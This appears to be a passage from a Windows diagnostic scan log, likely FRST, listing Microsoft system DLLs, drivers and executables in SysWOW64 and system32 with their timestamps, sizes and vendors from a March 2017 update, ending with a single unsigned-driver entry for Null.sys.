2017-03-14 18:36 - 2017-03-04 07:21 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.HumanInterfaceDevice.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 13873664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00632832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sud.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SmartCards.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00534528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PCPTpm12.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00506880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Wallet.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00424960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msutb.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00386048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFiDirect.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanui.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00325120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00714752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mbsmsapi.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-03-14 18:36 - 2017-03-04 07:19 - 00390656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00318464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchFolder.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Picker.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00226816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore6.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00819200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppContracts.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Ocr.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00525824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintDialogs.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Usb.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00254464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssphtb.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssph.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2017-03-14 18:36 - 2017-03-04 07:17 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2017-03-14 18:36 - 2017-03-04 07:17 - 00238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00858112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00850432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasgcw.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00762880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprddm.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00636928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00526336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mscms.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CryptoWinRT.dll
2017-03-14 18:36 - 2017-03-04 07:15 - 01543680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmc.exe
2017-03-14 18:36 - 2017-03-04 07:15 - 00509440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-03-14 18:36 - 2017-03-04 07:15 - 00336384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\azroleui.dll
2017-03-14 18:36 - 2017-03-04 07:15 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2017-03-14 18:36 - 2017-03-04 07:14 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.3D.dll
2017-03-14 18:36 - 2017-03-04 07:14 - 00236032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmWmiPl.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 07626752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 04613120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 02458112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themecpl.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 01228288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 00675840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 00256512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2017-03-14 18:36 - 2017-03-04 07:12 - 00901120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2017-03-14 18:36 - 2017-03-04 07:12 - 00884224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2017-03-14 18:36 - 2017-03-04 07:12 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Sensors.dll
2017-03-14 18:36 - 2017-03-04 07:11 - 01323008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2017-03-14 18:36 - 2017-03-04 07:11 - 01320448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll
2017-03-14 18:36 - 2017-03-04 07:11 - 01137152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2017-03-14 18:36 - 2017-03-04 07:11 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTMediaFrame.dll
2017-03-14 18:36 - 2017-03-04 07:10 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-03-14 18:36 - 2017-03-04 07:10 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Editing.dll
2017-03-14 18:36 - 2017-03-04 07:10 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.BackgroundMediaPlayback.dll
2017-03-14 18:36 - 2017-03-04 07:10 - 00300544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\regedit.exe
2017-03-14 18:36 - 2017-03-04 07:10 - 00259584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msdtcuiu.dll
2017-03-14 18:36 - 2017-03-04 07:09 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll
2017-03-14 18:36 - 2017-03-04 07:09 - 00570368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2017-03-14 18:36 - 2017-03-04 07:09 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2017-03-14 18:36 - 2017-03-04 07:08 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-03-14 18:36 - 2017-03-04 07:07 - 02748928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2017-03-14 18:36 - 2017-03-04 07:07 - 02643456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-03-14 18:36 - 2017-03-04 07:07 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-03-14 18:36 - 2017-03-04 07:07 - 00895488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Streaming.dll
2017-03-14 18:36 - 2017-03-04 07:07 - 00545280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:06 - 06109184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2017-03-14 18:36 - 2017-03-04 07:06 - 05380608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-03-14 18:36 - 2017-03-04 07:06 - 03198464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2017-03-14 18:36 - 2017-03-04 07:06 - 02153984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll
2017-03-14 18:36 - 2017-03-04 07:06 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToReceiver.dll
2017-03-14 18:36 - 2017-03-04 07:05 - 07468544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-03-14 18:36 - 2017-03-04 07:05 - 01221120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2017-03-14 18:36 - 2017-03-04 07:05 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll
2017-03-14 18:36 - 2017-03-04 07:05 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidprov.dll
2017-03-14 18:36 - 2017-03-04 07:05 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll
2017-03-14 18:36 - 2017-03-04 07:04 - 00753152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imapi2fs.dll
2017-03-14 18:36 - 2017-03-04 07:04 - 00719872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_sr.dll
2017-03-14 18:36 - 2017-03-04 07:04 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2017-03-14 18:36 - 2017-03-04 07:03 - 02363904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-03-14 18:36 - 2017-03-04 07:03 - 02109952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll
2017-03-14 18:36 - 2017-03-04 07:03 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2017-03-14 18:36 - 2017-03-04 07:03 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-03-14 18:36 - 2017-03-04 07:03 - 00359936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxclu.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 04423680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 02740224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 02484736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gameux.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 01709056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netshell.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 02646528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01993216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01988096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Perception.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01595904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01571840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01564160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01556992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01293312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2017-03-14 18:36 - 2017-03-04 07:01 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01154560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Pimstore.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 00827904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 00773120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2017-03-14 18:36 - 2017-03-04 07:01 - 00620544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 00560640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserLanguagesCpl.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 04557824 _____ (Microsoft) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 02996736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-03-14 18:36 - 2017-03-04 07:00 - 02483200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 02003968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 01883648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Phone.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00862208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00691200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00654336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00444416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll
2017-03-14 18:36 - 2017-03-04 06:59 - 00353280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2017-03-14 18:36 - 2017-03-04 06:59 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2017-03-14 18:36 - 2017-03-04 06:57 - 03106304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2017-03-14 18:36 - 2017-03-04 06:57 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2017-03-14 18:36 - 2017-03-04 06:57 - 00449024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll
2017-03-14 18:36 - 2017-03-04 06:57 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RADCUI.dll
2017-03-14 18:35 - 2017-03-04 08:57 - 00192352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 01617760 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 01294688 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00655200 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00590952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00565088 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00378720 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00343904 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00315232 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00242528 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00142176 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00086368 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2017-03-14 18:35 - 2017-03-04 08:35 - 00038240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2017-03-14 18:35 - 2017-03-04 08:27 - 00603488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2017-03-14 18:35 - 2017-03-04 08:26 - 00794416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-03-14 18:35 - 2017-03-04 08:25 - 01117024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2017-03-14 18:35 - 2017-03-04 08:24 - 02482280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2017-03-14 18:35 - 2017-03-04 08:24 - 02186896 _____ (Microsoft Corporation) C:\WINDOWS\system32\hevcdecoder.dll
2017-03-14 18:35 - 2017-03-04 08:24 - 01051112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-03-14 18:35 - 2017-03-04 08:24 - 00894096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-03-14 18:35 - 2017-03-04 08:24 - 00646688 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2017-03-14 18:35 - 2017-03-04 08:24 - 00354264 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2017-03-14 18:35 - 2017-03-04 08:24 - 00108384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2017-03-14 18:35 - 2017-03-04 08:23 - 02512304 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMVDECOD.DLL
2017-03-14 18:35 - 2017-03-04 08:22 - 07786336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-03-14 18:35 - 2017-03-04 08:22 - 02213760 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-03-14 18:35 - 2017-03-04 08:22 - 01354312 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-03-14 18:35 - 2017-03-04 08:22 - 01172984 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-03-14 18:35 - 2017-03-04 08:21 - 02255712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-03-14 18:35 - 2017-03-04 08:20 - 00379744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys
2017-03-14 18:35 - 2017-03-04 08:20 - 00128352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2017-03-14 18:35 - 2017-03-04 08:19 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2017-03-14 18:35 - 2017-03-04 08:19 - 02049480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2017-03-14 18:35 - 2017-03-04 08:18 - 01181024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-03-14 18:35 - 2017-03-04 08:18 - 00764392 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-03-14 18:35 - 2017-03-04 08:18 - 00219040 _____ (Microsoft Corporation) C:\WINDOWS\system32\IPHLPAPI.DLL
2017-03-14 18:35 - 2017-03-04 08:18 - 00118624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-03-14 18:35 - 2017-03-04 08:17 - 00409952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2017-03-14 18:35 - 2017-03-04 08:15 - 01000280 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2017-03-14 18:35 - 2017-03-04 08:15 - 00404320 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSetupUI.dll
2017-03-14 18:35 - 2017-03-04 08:15 - 00063328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2017-03-14 18:35 - 2017-03-04 08:13 - 00635456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-03-14 18:35 - 2017-03-04 08:11 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2017-03-14 18:35 - 2017-03-04 08:11 - 00266544 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2017-03-14 18:35 - 2017-03-04 08:10 - 02828384 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2017-03-14 18:35 - 2017-03-04 08:10 - 02189664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-03-14 18:35 - 2017-03-04 08:10 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2017-03-14 18:35 - 2017-03-04 08:09 - 07220696 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 02750384 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 01860288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 01293152 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 01157000 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 00857440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-03-14 18:35 - 2017-03-04 08:09 - 00681312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 00658784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-03-14 18:35 - 2017-03-04 08:09 - 00635864 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 00578392 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-03-14 18:35 - 2017-03-04 08:09 - 00527808 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 00402272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-03-14 18:35 - 2017-03-04 08:09 - 00396168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 00178520 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2017-03-14 18:35 - 2017-03-04 08:08 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2017-03-14 18:35 - 2017-03-04 08:08 - 00509280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2017-03-14 18:35 - 2017-03-04 08:08 - 00450400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2017-03-14 18:35 - 2017-03-04 08:08 - 00342456 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
2017-03-14 18:35 - 2017-03-04 08:08 - 00223584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-03-14 18:35 - 2017-03-04 08:07 - 02913144 _____ (Microsoft Corporation) C:\WINDOWS\system32\combas
U1 Null; C:\Windows\System32\Drivers\Null.sys [7168 2016-07-16] (Microsoft Corporation) [File not signed]
